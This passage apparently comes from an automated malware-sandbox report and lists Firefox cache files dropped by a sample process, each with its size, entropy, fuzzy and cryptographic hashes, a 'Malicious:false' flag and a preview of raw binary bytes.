                  SHA-256:8A7E3AD79712707538CAB4EAA89DDA3E2AA2E984EA4452D559350FD4F421ABFD
                  SHA-512:E624BCF5AFC23BED0D30DDF0CBB067F8B60FCA62EC7A39655F077DBAA77108365A52FF25887182C4F3A7FF7B140693ECD5CA3EE946ECFC783A1540709457E8AE
                  Malicious:false
                  Reputation:low
                  Preview: . ..........:..'..yP. G..V....k.......1...|.s|....6..n.5.B...R{.2.f:c......s..<.`.........N.Y.XvQJ{....<...m....J[.s1. .`gee..tu..i5...l3.gM.146... T#-./.H..2g`3.#....~.u.....P.......~...L.i.j......B.*....4..F......aX.I.....P...z.Hq?.[..b...C"5....a.#..C...$..J.%...H.<.......#.G.Z,.!-9.<.Y..Y.........U.V..dj%......".~.r.z.M.....c]{..S.......L..H....a"...v...R./V[?f>.\P..`.K...e.......;....w............L....KKb..B.[fO.^......Q0..A.]..?../o.CqO......."...7.-.y..o......gi...........it.b.=...~..R.h....O...WM\W.+..ZrU.....C#.X.p.y.7.cX..8......E/?Z......7Zf./1....M..`.P.....^....h........rR.31d......Z.&...As.q..../...).*gl......%N...;.aj!1E...3F.......TUwi.1.....X.FTY.; X...j.......:..,..8........*.-...{b&]jx.P._.F0.,..........q....A..."..../.'.....}...O.S8}......2=L.........3.Yj....V..zX....1....A.'D.l.,....jR....O.>k".E1.G.........]1..h.. [..q.n.e,+..h...5e3:...{>=v...A./...^.Qb\;.........D.. .........d..8..s.V/..`.g.3.]...4.,.M.{..JhY_..TM..{.. +..].9..X.....<n.A........FU......Ut,D...5
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/18CE467B00ED7B507CC72681EDCED9F73527CDD9
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):333
                  Entropy (8bit):5.926333950894281
                  Encrypted:false
                  SSDEEP:6:QTglWLRftOt8gNKuuzQ+1zmhOO/EUyp6XcYovBbVs:Q+WLRfiTgQa2DcUBKBbVs
                  MD5:7BCE111EC2E9A32E827BF8E101F967C7
                  SHA1:8054DA77D5FBAAF71A8047A9A69B330205CB73A8
                  SHA-256:33E078F33C671A750FC8158DC231995898C975C666E5434D2AEDD2AAEDFF2A60
                  SHA-512:D4F7B9D865A516D8D9C9DA16E3B2784F518EB7ACD133D537BA702B47213016AA82AE0C424B408EA73FA6056799C16DD315A6D36C5CC4A273A70E92602006F920
                  Malicious:false
                  Reputation:low
                  Preview: ......T.b.P..s^.....0..A.../a...-..8.2...r..z.l..1.A"k......7{.....1.&b..i..c.L+h..i......~y......&.M%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................9z... c5V..0t\...+T....vQ_.......$.#*....%`.............
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/196BCA845E91608F7B4CA6127A60D20AF55413AC
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):9169
                  Entropy (8bit):7.969156501207209
                  Encrypted:false
                  SSDEEP:192:rK8cUTHbOJlSF10b5vsGHdXlnEYZcGbe6BflbsSiCvcZQn:rKGHqJlg2BsG9VnhZcme6Bf9hvaQn
                  MD5:1C67AD875F092DE80C78266972126B0B
                  SHA1:64A7996ACCE35CAC96F00D1146084A36D8560B83
                  SHA-256:B505C644F69F6C84A43E3FCFF3885FC2D388F35785AF5FC619571109A484C9F4
                  SHA-512:28AE7D0F478704D7FBB02A0BFB2088C6DB52D46E77B721C9E5BDF4A4C9227997117C67FFCBA67A000BB73EE850ED73A4FB28F93F51245266F74C2C0869D7264C
                  Malicious:false
                  Reputation:low
                  Preview: Q01Y..V0....#6a.v?K....SRAt-..*....Vb..Z...`7..\2........].....H;ldjSa.r...AQ...!...pw.............A....mw.....*.........'...0j......s..x...4...+a.& ./...-..b..0;.X.....0...^.V'k....M.YH.x..[....]..C...1./oO....G?..%.#.V.&...<...oB....,.". ....C.[v..FN. ;.&......PcH.@%M...2......(X...;q.'.....H...&...`.:...i..zBXlD`....K.|_.n.[..m..`h..(s.............n.4.ZsE.2..|.......v.S{>..%D.w..|.......S)..=.....<.#Y".b.?.%kYR7..c.O.~..x..L..97.]]....^..._o.c.8rr.x|.............6Z..i7{...9".l..".....]...ch...?.+\/.....R.C.......xl9A.J..8.v.I^D.yu.l.Q.hG....b.L.*.L.<%..uV2Q..`.o...s.j...1Hg...KV.^...K.....5N....B....~...Nh.....MK..TT......hA...............DFA........~.w.g...e7.*'..x^.m.....^...y.T......?!.@@...y..]n.Hyc.g\.z.+[..p.8..Z#...B)....a.......b.........V.v...^.(....i..Qa.:.2J...y.,...Ai....F.......f.R...e. >7.T..$.vX..O>1,v......O7...k......:_Y......k3.A.D..7.QH...Ao..w.A~..[...q.Y.#.&........gAU.K....xTA.L.4).\.....3R.D.N.4o.....]....l.xW.9..........N......"\.*......l=....K.i_"...>.-}}}i.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/1AA5DF3AA9BAF5D88A5D31A2D2753A33FA1BE5DB
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1718
                  Entropy (8bit):7.714359304825813
                  Encrypted:false
                  SSDEEP:48:S5uIxf0KHvjOKeUZXiAjfz3fOur8iqC9kIDD:SZxf8nUZySfLO3itDD
                  MD5:B69659299696249F02A7CA1FB8971AF0
                  SHA1:24F9762BDDDFCFE398A00DDD652B02E552F020E3
                  SHA-256:19C9C199ADB6996732752156ADDF1990A9D0145DC8FE18BB695AE6468400BFF3
                  SHA-512:A5E7088F7B68F6FF9B858C5621B0FDD6785A393529A21F93478469024AC8A2AB357D8AA5C52ED0C16A6F71E68B77DA385E5337F7972FAE0555F4CF8E641BD027
                  Malicious:false
                  Reputation:low
                  Preview: ...U.Kd...>.;.^.[.7.\.%.+.C..#a.=>.@.d.5$..?6.ke79....g....#>.)_.zu.\D..l:r..0,G7".R..!)(....>I.X..-..1 -.d......./......5K.DtZ...`.%....).".}3....uE..2k.%.O....z.7...:.v.......:..`w.W7...S...N]...>,...x.9......a=.....Q...R.i.J.........X.j.......J,...f..W.O..0./...M..........7.$.L.#m..._.t...:b.Y..;.P\...Yem.T9.'Kt...W....g..!...4....>.....!.t.b....;wI.h..^....JJ.Y..*...I#h.......&........;.R....."R..CS?N..}.$......2....Q.F..=........yu.....(.}gb.+..8.X.N+..I..5.. w@....Q.}oTd..-...i..?..3..SH.o-...).N..+.....^..Hy........:P.....U[.5..q....R....?..N.m..9.....p.R..Fz.KW...2*..hG..d2.....?...!.R.............D.C.......Q._f.H..x..2.....Ri..Ud.f..$..%p].......a;...\.RI ..A...x...!..I.\qW.F.?!..x......Kp. f.2;.....r..^.|).'.3.....T.g..W2.....)....\~T.I.pTx8..TnF..........0N.n|.....oW...hN....F.I....u[..;_..(....fQ]._...3/..hz1..D`.6...P..t....i..l.... .|N`N..JS..R.5..U......j...f........Y.J.-r!....`pwmB..{..F..Aa_,..tl.7wM<P..5.p|.S......Is..5[...!.1h.<.S..[..A$J.W.`/...)..#.,...G....eY..eq.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/209BF9506FC39F83D5367695CBEA892DE228933A
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1737
                  Entropy (8bit):7.741062408410064
                  Encrypted:false
                  SSDEEP:24:szlpsOzhmpGr1F49PpSVMPSCf7PeIirugR0LKFyCdq+E98cp4HmwjH4buxlKguC3:sppJhmpGA9PpPj7Ziy5+QWvcFZCxeDo
                  MD5:422EF3CCE01142A66B1F8FEDC47479F0
                  SHA1:EBDE2BB4DE09D9749C2CA7636B1124126B2B68DB
                  SHA-256:4788180F62C3597D626ED86AB2F655401D6C2FF2C81B33BCDEDC25D3D8F101D9
                  SHA-512:281267AF8DD570A30CA3F279B15AF6087D0AA1375BF651EE783801768C51743116C91A83AB82DE338F2F094ACA8E497A59A5D1F8BBE48A887A82BB82415228F6
                  Malicious:false
                  Reputation:low
                  Preview: ..j.<A..3..Y..l.....}q.Hc....+X..cR.l....&J.s...k.f6vP..\.E&.)..~..n.X{.5..C...~.!..C...0.9.dw"}.fB...AR.w.x......2...i..q<.4.....6............]....$....A.o...N.DD....t>..\:.`...B......"c....H`.z....6ss.3.I......."....(..9'... Y....-..&M..............%.......'........69.3....F..x;.....K..]...W.C.l.]..._0.n$:..n....$.f.......N....t^.O'..'.F.W...Dt~.r.M........#.."..p..I.I2C8....]k....v.X..Y..P7d..Y......l.....'N.....6............K.b.(X...:........".>6$....9.ZU..eL9J(...ki....r..4...j|...>..`h.,..sm1....sD..s.A%.C.P...o..../.K`............9.o.zf.q...j/._v.....G^.`y..B+Q..av..q..:.V....a.mc..ni*'.NF..YZ..[.5.W.M..._........k......"..... ...,......."6.....S2h=./3j ea).....p...&.W.f..Z.c..I3..Na0.U.......a.N.I1SA.Mt.Qk..l...q..N........u~J..G..@FU.F.kh<.em.Wo.C...4....).....$0..u........4[...G.......v).5.....^z..0.($...q=....8.....\....g..........>.=..9...i... ..g...3.U:.B.6.....Ik.J.eTf.@b.b....;6..+..&..I..w.N.....jA..z........"p...p.=bU@O........&....._CK.b..gUv..%...b.......~.+.z.sZm...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2B610FAD6EE6174C3C15BA488F7D896FD22FF794
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):19342
                  Entropy (8bit):7.9865710913156205
                  Encrypted:false
                  SSDEEP:384:waUUwKS63wPEdj2h+7r6gF5ZUYPg28+bQc4OYuJ2TDkb+971WjDsV:wxUwKF3ueqcX6gZFI28+byOYuioy9pWG
                  MD5:E627A86239B091B325CAB3F831110590
                  SHA1:6E75953FFB0E81CEF49919AF871DDCE5F3550490
                  SHA-256:F2075380BF40A4653746A0C5200CC4D58267C00349E53C6AEE14405B52C32D96
                  SHA-512:EF821CE70F42BF6365078A3A394E77F350E7499BA71AA7D81D728A868937FE1986E7F45BA83B98C50A95F026F302075D70FA464807496777E8CD4E3A0475A0C0
                  Malicious:false
                  Reputation:low
                  Preview: .I..............d"...>.l...%.Jz...]tP......a.:.Jjn..4x....Uhq..`.(..@&.Uw.....n...m.z .w.....f....n.Q..X.5.'..n.o.'..../.....s ....L..y.......&....&4NS6*..!.....1...N."|i-....:....4s..O.i.:.v8...q.n.......!.^......9@.w..{..D'..F....3...........2.......(...x.ala..n.t+r\... T..k.\.........gI.h.0.....q..........^..=y\.z.....(..G#$........*Hs4....c.4..)K}m..h...B..K.L....!.]...m...@.O...|)..........^.p..K...c..mJi.l.#&CvY..........z....z...h...@....)..JR.........B.....p.*6..9Y...._u"`.......pn...(..B..^xz7.{Y"...A.5...1U..5..x.}.-.B%c.Xo..z.H.+......4.*.5.{h.........,.v..'..w.....o......^).....&.U....@...u.F......=b.r....n.!q{...0vN.D.B...2w..)..M..l..7:../yw....f+.ezd...'...Y.e.....JzZ.E.E...E....U.......[$.6 `..q.j.U.:......704...#.`.....W..:.....aS.......d..x.W....|...W...v[y;..xb..K#....TA%j9.......~.C"..c..).<.....^.$...^.A.....V`.E....U.o}..W<.w=...6........T..G...."2.....g.o6E......{.QJ..W.-.U..*.}.s\.........]V.....0Yc...ep&...J.....A..0.y.s..............xHnNh29.i........2.)..MH...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2BC6D22E320C3AD5F122613FBBF24D8F8DDFE8D2
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1538
                  Entropy (8bit):7.679354262561046
                  Encrypted:false
                  SSDEEP:24:dtVHqGov0DRUVrkMuDFh1bnwG+0znTqy53fC8Uv33hUznIfsQqRyi2DfG+V:/VKTGRkgFzbnwqqyFfBUvniznCqYDeK
                  MD5:6A74E56FD2310AE489A28DC959BA2FB6
                  SHA1:AC2B5DFEC78750914D4E37D45B32C845BCF2D4C3
                  SHA-256:A7189CC6162BC04F11455EDC675154811D3B41D149D60C1D0554ECAC422087DB
                  SHA-512:D02103FDC1EFC7D5C256465240F756C29FA4240EFAB632C86B48199EC60E919E50BD36E80C6260A93BD14F47BA8BC98E1778F63C0596C38D3B1D373BA53FFEE3
                  Malicious:false
                  Reputation:low
                  Preview: }...H...Q..........&.)....nqR'...'.c..l....K...wd8.R...i..'g....`.'.Wj...-2._...uJDH...Dg=....TU\_F.._...[A........!7..k.....~......n.H..4....[..c(.."..j...R+..........j...n,..Ec....~3I...6.<..J.0..,.?....W5.'C..G.rg....n.......d.T.w.Uc....O.l..k..98.._|....&.'./Z..b.......ad"t.*...E...;...#],...(.rDe....Gb..'.O.....([..%.9o..........'.....(F.........W.( ....,UF.U.......W......J.T...k..T..-G.....L..=.T....qzsk...:..$n......s'efjE..C..q..).I..C.._.Dz..2..:.*.m.oq.$M.h.ce.q...<..iPu..=. ].g.O7YGp...Y..yy>...>l3.h.....`[...8HS..%.R.6...U.`...C.....W.4..../.!D`.z..K...H....0...7;.......x........gA.v..~T{.z....x.,.7..e..j7.....X....J0dn..k.ZR6r.oK~.......A........fg....q~..........c....?...F..i..Pn...+3..aT.KT>..y,......v.85.g...G..:...g*|k"]..$...cLFG..a...W.,.R..S...."0...Y0.\.?.?.R..J- `.'...-w^;.....j/...[...Bp.?[..l..._]zI..M...CP1.G.d..*I.J..].........+..._.g./.-...n....I..I.|?.+1.D.....bUm...F5&3...Al1o..uH.Q"s3...Z.f...W.._5.<.....C(..4.@.3A.=h+Yn...".....UkB../..NP.......D.TT3f...6
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2EEBE7D9E8B2C0EC2F1A732F578AEFE4851A2A53
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):7210
                  Entropy (8bit):7.959038748851169
                  Encrypted:false
                  SSDEEP:192:96j2h2QXmNW0oJZDDUH3SgPeFr4UaDykTnuV6:oj2wQEW06ZfYiRW+kTS6
                  MD5:FB00B85CDA13FCFB7939C363F19B070A
                  SHA1:4A8BC17C0906D2929F57FDF34697F1DB22B5F7BC
                  SHA-256:2612D31E977B663DA3239F3B74977A648DDFBAE730DE870E739AE74C4899205D
                  SHA-512:F3BF4EC4389D4B9D637671E84EA2D2D38697D729509FD3FC60496683D52081E74E594D419368A4C2493C38DC4A48649B468C3C88312147012DAA0DCB0783B444
                  Malicious:false
                  Reputation:low
                  Preview: 8.T......?..U>...a.(1q.;......Vm..z...&.>Qg....G..j.z.d..M...-.N R...U........D.[$.G2.KF....sn.W.?..1..9.ABa.!....I.N.P ...'.....\Z.].Z..\!7..,..`<q..>y....w.....?+.b....<}....wGW_%..Q*.tNq....AX.Mg.AD]._..I_.e...)...}VH.]V...v.i..A../.$.oH.X......K..4.....>a..:.._..8.,...{.%S........ )_.$..JY.T..Qu..T...Y..(..fh...R....X....i.@@7i.......uU,.s".s.(.J.ic7%.m./..P6F.....o...t.)...k.sK...dS..5....m..N{..98.U......?.J).B0p...M....I.#.M..].R..5..r4V..#d..;...@i.go......^Fcn...+ ...S/.."....V...,.......h....../,:H".K..a.k8........bH....|....V.....5..........huo.y....E>-l./U^.........3...7S.9......Ti&t.E.}..z.a...JB...}...B.6S...V..I..v..I".V...x.Vx...W..z..q.x.8t.......:R_@..::.H.!=[...o\0....;#k6O1k3[[..r....A.G.cd1z..W..6.w..7...'+.|g@.@.....4=.Z..G...Q....*.......u.v.....b.>=..yl*a.9.hR.........l..\..RIK...av....o........y.c.)...>.....8.z9<.....^....`...L...A..2<...........A<. .....U.p.._72....9.'Fe.Es{...-...N..!l.....+.<....P.....N......Op..0P.%(...Rb...6.q.n.......s....,.j...(/D... .B.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2F8D3E7DF38A8EFF19A37E06DB9A7C5A88B70C11
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1388
                  Entropy (8bit):7.64221588437184
                  Encrypted:false
                  SSDEEP:24:sIesX/19zrv2QkdU0NDkLiRutcRSvJaB+x600y2DfKEAv:sIee1D5kXl9ms0wDnG
                  MD5:DE190E28F4B5FED239567CFFB98EAD15
                  SHA1:287E4FB9F2E8A88C78B4CF1855A5F59D44B887FA
                  SHA-256:1555A474E1045F90B44DDAA78302DBEFC61B579F63D4F52355C5CE0BFE858131
                  SHA-512:5C2259F320543B0DB4DA3E952E19860DF4BF25458C50FA13F014F0370494A7156C9551CF658382CA712627F5B14CA8602E3C94F0AA7D3F78FF0743DF54191A48
                  Malicious:false
                  Reputation:low
                  Preview: i..O.Uk:....a.JS...;........`c?$a....../.....-....."..G......CM.9...6.};.`v..#~.7m...I.v.....~..oAe.u.nPu....%.....<i.....^...v.....Y...l.c......L.UC....RJ...t.VI..Q7oJ.0Pa..t....\\..m.#.......8..:..|:...*....~.%.....o......z.9.R.....//0R...>......z...@R..g...D...]...m.:....\.....s6....EY.C..3.]u..h.%&K.v.QR..(.k..J..J..l..=..9.UpT-../M..N.F........~..-....g...Y=."u.k.+...M...e|..Z....^1.!.5.>.Ro....%.B.{0...8..........H..[{...O..@. ..d.=.@_..Cx...3..X0...I0(...26."......K...7.4.......Z.....]^.4g..$.v..J..[...."8.c.|.J.M.#p..<@.4{o.\\^.&L..R ...g....D.i-....x.=.......T...t.P..(.d..p9n..c.EY.X..u....@...3...c..&..7..|J....,.b. :..K.. =.[7.v.0. .e'c.......y.x.....{..'...C.|.|Cr?..C...m..-......./.!<. t...UT...d.^j.....,f..u.C0%9.J..0..!s....m2b.._..:.S.'.j....\..~R..n.....&...i..\...Q../.....e....)V0..z..+f..jS..!.[..........]..V.....B...m."#.Ki.....X........1...9F..s.LL..o....jL..Z...r.cl..{L.<K.I4#.e._jr.e/Fb5.....ex..;.".y.^o_LC......p..L3<...z.....s1!k..K.jy...s.. .....}.C9{.(d..~...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/3288ECCBE79F56B14DBE6FEAC3F20AEA108CD0F1
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1615
                  Entropy (8bit):7.717577529496701
                  Encrypted:false
                  SSDEEP:24:k0L77fWDANhxIk1ztC5a/BWQ+lHt+hiSW3pr2ZH086U3GaqvjkHSbtW0jY+tQne7:XL77flXxZ1E508QBhyZwU8Aaq2YujD8
                  MD5:A2F9B750E1A98CFF26C3FEFBAF1BA6E4
                  SHA1:801B738BFD55DB3523FBE520AB2437A7BB271868
                  SHA-256:ABC1C97A044C099B3F90F6E0AA5CAB6EA3C2BAD70D73E4BD345BD43719BB3C2A
                  SHA-512:96277A181375C18CFA1C7303EEB24802685554B30B4D4A5B9DB8B0F5DDB82C4C251D2CC70DB1024327052A4536C98736A05EB49429293ED9A06E830081AB2B57
                  Malicious:false
                  Reputation:low
                  Preview: .d3.z}.v.;..6L.@.....a....+-..t.K...O.(.\..s@.z...../9.m.S........Q.......in........._fd.. p...N...g.......&.....~hR1F......)/y@.m}@......T.....]*.!...ZF$.E!?..q.P....X.....8....W.....~........xy.:.........J.o.r....j.T.gF....G...1.RT....f3T.....5{.v'6.... G...]?;-V..,.9v..r..9u.4..li6;Cv.2.....].......,.4..7!....$.........K..g.Yx5........./....Yj......J=............>(=....N....P zE...u...&....*.L.6..#.8...../...b...$:.....!H.D.........EH...#}jy0...lj%]........k...L.J.y#....T.p..E.i....4o.d...AP..k.!A...;,&......_.J.<......LC....*...(}...]C.F"..F3......R...s.#.+2`;Z..f.F...A.......6..9+............3.4.)].I.....s..P.:......;...9.....r..m=.....>...{..>..........J..8....&.r....A3...........&C.k.^&..A.....=hJ.:..7C..a..............c..r......`......p`.x.J...Y.xrf.q.._..2..^.*..S..p>..l...do4..:xo.-SQ.j.8@/.....I..c~?pk.z.f..I...*tL{.g.. ...k.B....s..........][....*~/.$@..."W.._Q^R..JjY......!.......~..... 2:.O.....I4.x.H..:.^@_..A.....S.FU...JE.....u.5....../.p...e.[.M......Q....TW\..+.....R
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/39C1621C6763027D614390D31A517751A4AD91C3
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):13161
                  Entropy (8bit):7.9793472320293475
                  Encrypted:false
                  SSDEEP:192:CRT8O0veA2Ong510SdSSPB3eUvXIxZz1ZshGCLfK1HcNakSKjgcKwyCtQBz3ZF:CSO9Oba/vSZzvIGCLfiHezEjAQBz3ZF
                  MD5:69E4AA393A05899BFA9CB6F257C821A6
                  SHA1:4B444F2874CE93A541E8C89D89DFDC1E71665653
                  SHA-256:15DE45F61394BCB507FD1910D3E2A244FC6BC705EE8D40C7173747E7F5178C55
                  SHA-512:0E0D9D3A80E53E654E3170A0FE5B2DC5EEF99C907FC07FCCCE71BE597CEB3CFDB428E724FDFFFCC6EFAA47FF2C0BE2F40098D1EEA7CEB47B40771AEEBED8B6A4
                  Malicious:false
                  Reputation:low
                  Preview: ..Pzg.+...("z53[....+;.G3.,.....=&:7L..N.dM{.7D.......S@..<....'&.(.{..~...hEf?.....Y.r"f.K..(.}.......~..k..4..~.k..ev....-.n....>.j*...r...K...V...(Ep>S..'.....,.......N.d0.......4...Y..w.q%as..3.....Zl..{R...........abO...>...W^.......m..."..... .hc.5.!.HX..[.M.`.e.l.o....t...$g.....>...tG5y..X..r.+..i$....3S...8f....0.,.B..8;e..h.........rR`LW7....8.A'..(....(.#_....\.r.n..z:0HH..?s.0......^.....>....,...+r........j..t.|..F+nL....G34...D.e.r...#.#...E+X...9...^.4..G.......X.P...\...6n.G:...Z.Zn...iG....a...z..g.p...g(..8....H....fu.x......./..sf....'..1.........N...;..a.......}.....5'...'......I..BP....$..q.....B2...CkD*&M.W......v.n-...~.......kV.o.a..K....Kln]...........b.0..&.d.d......tv.#...;F-.R.j...~s6z.@.m.>.`...+j..!.....g{.0X.......>..u..J.p....qh.g..g.K...!.K....D...C..$.C8....[O..../....X.{.(.N)x.H....v...Z...j....'.!6..c.~P....{I..|....AA....)...kj..;@...sU....V...\.m...-...].oz"!.u...^k...,...B\...b.r ....l..u...l..._v..w.R,...C.w.....i....:...b....Su>.ng>.j...,.V..j,.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/3BE2F225068DFB4AA8BD93F696A41C16C8CFA27F
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):337
                  Entropy (8bit):5.974543653277269
                  Encrypted:false
                  SSDEEP:6:Xekb4iJC0SXSQs50duS+1zmhOO/EUyp6XcikGDwXb/F:O5f9s50Y2DcUBsh/F
                  MD5:2D4EEB12BA2CD62820A8D2E46CDA78B2
                  SHA1:6BF8CF35F5D35BEE3193E659AB2DC41F890EC0A4
                  SHA-256:8076CA114513C223970A24E6CCF2627B2DFE2954D4FFCDD09A737D206AAA1CE6
                  SHA-512:603A6C009B98B8E2946E0EE150F55F86462E9CEC0BD9A154162A21053B7CEC7B98797AAA5CEFB974B92AEE44CF103E298EA2DA30E18E0133A3B2E70EC0A6ED47
                  Malicious:false
                  Reputation:low
                  Preview: H......H|....A...r@`...G..4.?.........N...........P....b.A.........D_.......w.E...{.t.P0.L..k...L2...y...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................P.`...+.....!)o".l....k...P].DM......G...............D.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/3DF10699984A3086A21900FAEC5595CBE3948F33
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):7201
                  Entropy (8bit):7.957812559993077
                  Encrypted:false
                  SSDEEP:192:91ODWaAjCZewBz0NU4oB3jxP15JRWI7tizFDoGyofOIvdCbO4:SDWaA244z0WxjxfJRLJiWGyaOIvF4
                  MD5:E16DA64279693D7160F15C3693242A05
                  SHA1:4E0C86F805AB2CA79A34C4E4C38E953DF311AC84
                  SHA-256:C57395EDFA9A5189A00AC6034FF3D3FC843EF3C1F4FF36C6EEC5AFB320803EA9
                  SHA-512:412D70934697A7410E1B31422D8304E60AC2926080B034F84CCEAE3B28AD08B7E472A077942FB90740F2421C13AF8B715EA008757276ABD0E8C981CD734419C1
                  Malicious:false
                  Reputation:low
                  Preview: ....C$..'....a....*#.{m~....TA_)..`<...t6...C......CY....R.........._#....f.#iF.......~Y.].....v....%......mUOX..j..W..X}.o...&4.GH..m}...f9O....;..Y#dcl..K...sMz.B/...%..eJ.lj....A/F....."u>;.HN;.P<.gj.m.....Z3...{.84[.W..?.@YZ3.=.C]i..d*h}\.u..Bj.~W...n.u].}].l.....+).3}.B...........4...Z.<...<}..!........|..?.-...Z.kvv/...f..=W...G.{3.A.'..# I..#K............].~Jb.K.Qg.~..u.E....C....7.[.....H..B. .....qC.e.B..H..3.$.'.....W.............e~..P...._......D...n...s...>..Jw..v.N..)..."Q...... ...m..........Z...XaI...'....[....n...V........uG...J`(.E.y..8.-..OQ../.OL{......-.....r.T._....#...d..YS.[.".....pY.......=Y.aI........49..PcQ.6.!.......>.T......b..........<.0T..<.|u.....m..j.,.m....... .Y.oa...U.......Y&..i..Z.:y..v>.:..}..Q..Y.{rJAoO]...k..Ga. U'i1.C:....~X.TN..u..I"..y1......G.1F6.l..u3.MT...X.d...C........h/.N..f..J.'..0...\.2.....1yM.o.c..:V...b!..R..T...t.~7j..x...7W......k..K>5..h.}...7.....t.;.KQ...4..0V....._.....A\S....fc.K..Wc..@?......-..[...o..n.M.<.H.oF.:...m.51.._.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/44852F548E2DA4AF2A968DAF307485F74EF6F3C0
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):12648
                  Entropy (8bit):7.978081058591125
                  Encrypted:false
                  SSDEEP:192:mcC7A8SRBqmhicUX3Hmg641p582BdnffApN9fGdgyWRhs2Fr3GT6T/:mWVs5Hd1prBd3ApmWRhsVTW/
                  MD5:EC9E680DF2F507E7AC356650866E197D
                  SHA1:C2B0C575D473CE6F36B3DF61F138848769E68237
                  SHA-256:E80FDD008700B87C63AC52BC9DCEC428B2040A5CEEDC613C6B30E046C3A6A02C
                  SHA-512:56C8C2F1AC5F62BFE56E8FC7586E53BB961DAF64452CBD4E0739797916FDB2C9BB3188025DB99ACD1C0B53E6DD9AAB5F5F9D954F5FE1943A9A7DAAA14BACC25B
                  Malicious:false
                  Reputation:low
                  Preview: ....).m.R.X.m.%I.....a....I\)....yo=.3....E6\......o7Y....I>ei..b6...I|z.Z..:.N.<....#00Y7.....m7..h...V.9.../.S.&s...5..S\...%...e..O."7..;...@X..f.t...s..Lt~<;-/M...^....?.N7.{^........H..n]....Q..P....0.CY....0H....m@.$M.r=.*.....6.y......;.....+I.6t..9x.<./..I.@.._RK9.N.vBW.W{....(Z.1...6..2..............b4.D"kd........c.......Z\........#>|.y9.q)QIWs....a..I.P...z.9*.N,..$.>.4.z.......!e......Sm....%..t...I...(........;Nq..|..%...=.....i3d...7Nb.....?.=.Ib{.A..:.\X.2.G..=/....[..S.=..|.H.2.f@+.E.AU{3%>.r....V.G>Pv.g.......V{.......Md....d...5.qa.Q...Q1..1ni..5.T<.a....APH...Tx..d9...R0.&...4}.......b....c....0...W...j.K.. .`...<.(....K......OKz....|.-..>3.Q............<$.j.j;..X..+..:4.[8.u......>...*....I{...Mu..... x...4...Q.#..O.jIK.5...9....h.u....Z.k..)2...rs...u.....w.....Fv....u..q...[U....L.b.I.@.;b.'[.).3.V..Jn...v...........].......3.?.5..W...|...f..h...l.|...... 8.N......^.73..a...T.....9Pnd.k....Vo..*......X.........4s?p5....#...b`.A....|.^..W.....h... T#u.....#>r ./$d.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/44F81E7E214B17FF25AC54556BC33AC0C1A62B26
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1538
                  Entropy (8bit):7.696496746819291
                  Encrypted:false
                  SSDEEP:48:B7WpJY7qHWJWqNodnB6nvOyI1x1PsmQqiiDD:tWTYK7KYVJQqiiDD
                  MD5:EB5CA74BD16E940ADE07F08739752515
                  SHA1:3EC696997928E65503E8140843BDB6E8D7E1693B
                  SHA-256:2D1F19A91FBD13166F1B26E5320C55FE37394873D2857FB8F1968389340293F1
                  SHA-512:A4F8FA43341CB32B4ECC2C3E1E58A815F2547C5064ACBEC67FDAB829E00A36C1160C238BEA7B6F21619FD3615B146C572D2BD19A1F5091D7AAF25CD5AFCCF5BD
                  Malicious:false
                  Reputation:low
                  Preview: ....Z.....}..,......6.+..e"...O1........./.(./.;..BZl...\....}...s..2^ZULf.2>i~jl./oE./T...7V..H......=.N.2..&(.D..........7....<Pv.S.0YM0&NS..,.......z.-...r.H..............a.b..h.Gl.X....7B.7.(.@..(j +...F.i<\Nt{f..AnQ..XXz.+eg.....U........([RW?V...P.%F.......S.#.%..g$.>yb.-{ZZ...f......O...._...w...U......s.y..#..3.3...].Pon....(...}"S..Ifs.0..x.. 